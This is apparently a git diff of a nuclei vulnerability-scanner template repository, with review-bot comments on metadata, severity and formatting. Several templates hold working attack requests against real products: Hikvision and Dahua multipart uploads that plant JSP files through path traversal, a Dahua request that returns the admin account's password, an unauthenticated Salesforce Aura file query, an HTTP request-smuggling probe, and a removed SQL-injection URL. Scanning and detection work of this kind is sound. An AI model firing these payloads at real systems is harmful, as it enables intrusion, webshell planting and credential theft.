@@ -1,18 +1,20 @@ id: CVE-2018-1271 - info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." - + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET path: diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml 
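Review bot: The hunk keeps the legacy `requests:` key while every new template in this commit uses `http:`; since both are maintained in the same tree, migrating this file to `http:` now would avoid a split that newer nuclei releases warn about. The `cvss-metrics` label is rewritten from `CVSS:3.0` to `CVSS:3.1` with identical metrics — fine if that matches NVD for this CVE, but it should be checked rather than assumed. The request `path:` and matchers continue outside this hunk, so the actual traversal payload was not reviewed here.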
@@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-18778.yaml b/poc/cve/cve-2018-18778.yaml index a26da58807..6c269ecee5 100644 --- a/poc/cve/cve-2018-18778.yaml +++ b/poc/cve/cve-2018-18778.yaml @@ -1,18 +1,18 @@ id: CVE-2018-18778 - info: name: mini_httpd Path Traversal author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - + reference: + - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + - http://www.acme.com/software/mini_httpd/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - + tags: cve,cve2018,lfi,mini_httpd requests: - raw: - |+ 
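Review bot: The new side of the cve-2018-15473 hunk drops the `tags: network,openssh,cve,cve2018` line from `info` and collapses the four-entry `reference` list to the NVD link alone, so the template loses tag-based selection and the upstream commit and advisory pointers a reader needs to confirm the fixed version. Keep `tags: network,openssh,cve,cve2018` and the list form of `reference`. Changing `cvss-score: 5.3` to `5.30` also goes the opposite way from the `5.9` and `6.5` normalisation applied in the cve-2018-1271 and cve-2018-18778 hunks of this same commit.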
@@ -25,7 +25,6 @@ requests: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" diff --git a/poc/detect/salesforce-contentdocument-detector.yaml b/poc/detect/salesforce-contentdocument-detector.yaml new file mode 100644 index 0000000000..19c7c66a85 --- /dev/null +++ b/poc/detect/salesforce-contentdocument-detector.yaml @@ -0,0 +1,37 @@ +id: salesforce-contentdocument-detector + +info: + name: Salesforce ContentDocument Detector + author: TedJackson + severity: Medium + description: A Salesforce Lightning aura API allows unathenticated users to fetch files. + tags: aura,unauth,salesforce,exposure,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/s/" + + extractors: + - type: regex + group: 1 + name: auracontext + part: body + internal: true + regex: + - "\\/s\\/sfsites\\/l\\/([a-zA-Z0-9\\-_~.%]+)\\/[^\\/]+\\.js" + + - raw: + - | + POST /s/sfsites/aura HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}&aura.context={{auracontext}}&aura.pageURI=%2Fs%2F&aura.token=null + + matchers: + - type: word + words: + - '"state":"SUCCESS",' + part: body diff --git a/poc/exposed/exposed-springboot.yaml b/poc/exposed/exposed-springboot.yaml index 5e1e407c32..51a66859dc 100644 --- a/poc/exposed/exposed-springboot.yaml +++ b/poc/exposed/exposed-springboot.yaml 
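Review bot: In the new salesforce-contentdocument-detector.yaml, `severity: Medium` should be lowercase `severity: medium` to match every other template in the commit, and the description has a typo; write it as `description: A Salesforce Lightning Aura API endpoint answers unauthenticated ContentDocument queries.` The word matcher on `"state":"SUCCESS",` only shows that the `getItems` action executed without a session; an empty result set also returns SUCCESS, so the description should say the template detects that the Aura endpoint accepts unauthenticated queries rather than that files were exposed.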
@@ -1,12 +1,10 @@ id: springboot-heapdump info: - name: Spring Boot Actuator - Heap Dump Detection + name: Detect Springboot Heapdump Actuator author: that_juan_,dwisiswant0,wdahlenb severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. - reference: - - https://github.com/pyn3rd/Spring-Boot-Vulnerability + description: Environment variables and HTTP requests can be found in the HPROF tags: springboot,exposure requests: @@ -30,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml 
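Review bot: The rewritten `description` (`Environment variables and HTTP requests can be found in the HPROF`) and the removal of the `reference` entry leave the template less informative than the lines it replaces, while `severity: critical` is kept without the explanation of why an exposed heap dump matters. Keep the previous wording, or at least state what is detected: `description: A Spring Boot Actuator heap dump endpoint is exposed. A heap dump is a snapshot of JVM memory and can contain environment variables, credentials and HTTP request data.` and restore the `reference:` list. The renamed `name: Detect Springboot Heapdump Actuator` also departs from the `Product - Finding` naming used elsewhere in the commit (e.g. `Dahua Smart Park Management - Arbitrary File Upload`).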
@@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml 
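Review bot: The first raw request's block scalar changes from `|+` to `|` while the second keeps `|+`, so the two otherwise identical requests now end with different trailing newlines; as the check relies on the body lining up with the declared `Content-Length: 6`, this silently changes what the first request sends and both blocks should use the same chomping indicator. The hunk also renames the top-level `http:` key back to the deprecated `requests:` form, which the other templates in this commit (`Hikvision_*`, `dahua-wpms-*`, the `topscoder` files) use `http:` for. Keep `http:` and `|+` on both blocks unless the change in trailing bytes is intended, in which case say so in `description`.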
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
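Review bot: The new raw request writes an executable `test.jsp` with a fixed name into the eportal webapp directory and nothing removes it afterwards, yet `info` has no `tags:` line, no `intrusive` marker, and a `description` that does not mention the artifact left on the target. Add `tags: hikvision,fileupload,intrusive` (the dahua-wpms-addimgico-fileupload.yaml hunk in this commit follows that convention) and a sentence in `description` stating that a JSP file is written to the target and must be cleaned up manually. `id: HiKVISION` is also shared with Hikvision_Env_Information_Leakage.yaml in this same commit, so the two templates collide on id; give each a unique id (e.g. `hikvision-svm-report-fileupload`). The same points apply to the Hikvision_Env_Information_Leakage.yaml hunk below, and `contains(body_1, "data")` is a weak success signal for the upload step that unrelated JSON responses can satisfy.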
@@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - 
".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml b/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml new file mode 100644 index 0000000000..0f612783a8 --- /dev/null +++ b/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml @@ -0,0 +1,59 @@ +id: arforms-881dfd77d6d86c39aaa256deaef65e79 + +info: + name: > + ARForms - Premium WordPress Form Builder <= 6.4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b23989c2-6cd7-4e55-b019-324644e7521a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arforms/" + google-query: inurl:"/wp-content/plugins/arforms/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arforms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.0') \ No newline at end of file diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml b/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml new file mode 100644 index 0000000000..f16ba560ae --- /dev/null +++ b/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml 
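Review bot: The new `description` is not a sentence (`Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.`) and no longer says what the vulnerability is, which the removed line did. Replace it with `description: The Dahua Smart Park integrated management platform allows unauthenticated arbitrary file upload via the /emap/devicePoint_addImgIco endpoint; an uploaded JSP is served from /upload/emap/society_new/ and can lead to remote code execution.`, which matches the `PR:N` vector and the `rce` tag the hunk adds. The template is tagged `intrusive` and uploads a `{{random_str}}.jsp` that is never removed, so `remediation` or `description` should also note the artifact left on the host. The `# digest:` trailer is a signature over the upstream template text; any further local edit to this file will stop it from matching.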
@@ -0,0 +1,59 @@ +id: funnelforms-free-d673e9b78beed9be045c9fddcda8387c + +info: + name: > + Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Deletion + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cd0e015-abf2-4905-8b42-46b685be2c74?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,funnelforms-free,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml b/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml new file mode 100644 index 0000000000..d1a67b3855 --- /dev/null +++ b/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml 
@@ -0,0 +1,59 @@ +id: special-feed-items-27adb5630206288cc4533169053590e1 + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml b/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml new file mode 100644 index 0000000000..a069e26609 --- /dev/null +++ b/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml 
@@ -0,0 +1,59 @@ +id: visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f + +info: + name: > + Visual Sound (old) <= 1.06 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3595f1c7-22a5-46c6-b81f-fe616a71116f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + google-query: inurl:"/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.06') \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml 
@@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml 
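Review bot: `severity: medium` looks too low for what the new template reports: the description says the response leaks the password of the management account and the matcher keys on `loginPass`, so a hit is credential disclosure for the `system` user and belongs at least at `high`, in line with the `high` given to the upload templates in this commit. There is no `tags:` line at all, so the template cannot be selected by tag. The two trailing comment lines are in Chinese (`# 获取后访问地址`, `# /admin/login_login.action`) while the rest of the commit's templates are in English; write them as `# Login endpoint for the affected account: /admin/login_login.action`.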
@@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ 